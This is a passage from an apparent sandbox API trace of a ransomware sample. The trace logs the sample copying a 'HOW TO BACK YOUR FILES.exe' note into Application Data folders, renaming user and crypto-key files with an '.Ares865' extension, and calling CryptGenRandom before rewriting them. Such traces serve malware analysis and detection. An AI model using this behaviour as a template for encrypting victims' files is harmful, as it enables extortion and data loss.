hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0108.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12") returned 63 [0108.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12" [0108.644] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.644] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\imjp12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.645] GetLastError () returned 0x0 [0108.645] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12" [0108.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0108.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0108.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12") returned 62 [0108.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12" [0108.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IME12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ime12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.646] GetLastError () returned 0x0 [0108.646] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel" [0108.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0108.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0108.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel") returned 62 [0108.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel" [0108.646] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\excel\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.647] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.647] GetLastError () returned 0x0 [0108.648] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART" [0108.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0108.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0108.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART") returned 70 [0108.648] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART" [0108.648] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.648] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Excel\\XLSTART\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\excel\\xlstart\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.648] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.649] GetLastError () returned 0x0 [0108.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks" [0108.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0108.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0108.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks") returned 81 [0108.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks" [0108.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.650] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.650] GetLastError () returned 0x0 [0108.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033" [0108.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0108.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0108.651] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033") returned 86 [0108.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033" [0108.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.652] GetLastError () returned 0x0 [0108.652] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14" [0108.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0108.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0108.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14") returned 89 [0108.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14" [0108.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\1033\\14\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.653] GetLastError () returned 0x0 [0108.653] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.Ares865") returned 127 [0108.653] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.ares865"), dwFlags=0x1) returned 1 [0108.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4187307) returned 1 [0108.655] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0108.656] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.656] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0108.837] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0108.838] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.838] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0108.865] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto" [0108.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0108.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0108.866] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto") returned 63 [0108.866] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto" [0108.866] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.866] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.867] GetLastError () returned 0x0 [0108.868] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA" [0108.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0108.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0108.868] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA") returned 67 [0108.868] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA" [0108.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.868] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.869] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.869] GetLastError () returned 0x0 [0108.869] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0108.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0108.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0108.869] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 114 [0108.869] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0108.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.870] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.870] GetLastError () returned 0x0 [0108.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 192 [0108.871] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwFlags=0x1) returned 1 [0108.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45) returned 1 [0108.873] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0108.874] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.874] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0108.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0108.910] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.910] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0108.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 192 [0108.910] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwFlags=0x1) returned 1 [0108.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwDesiredAccess=0xc00e0000, 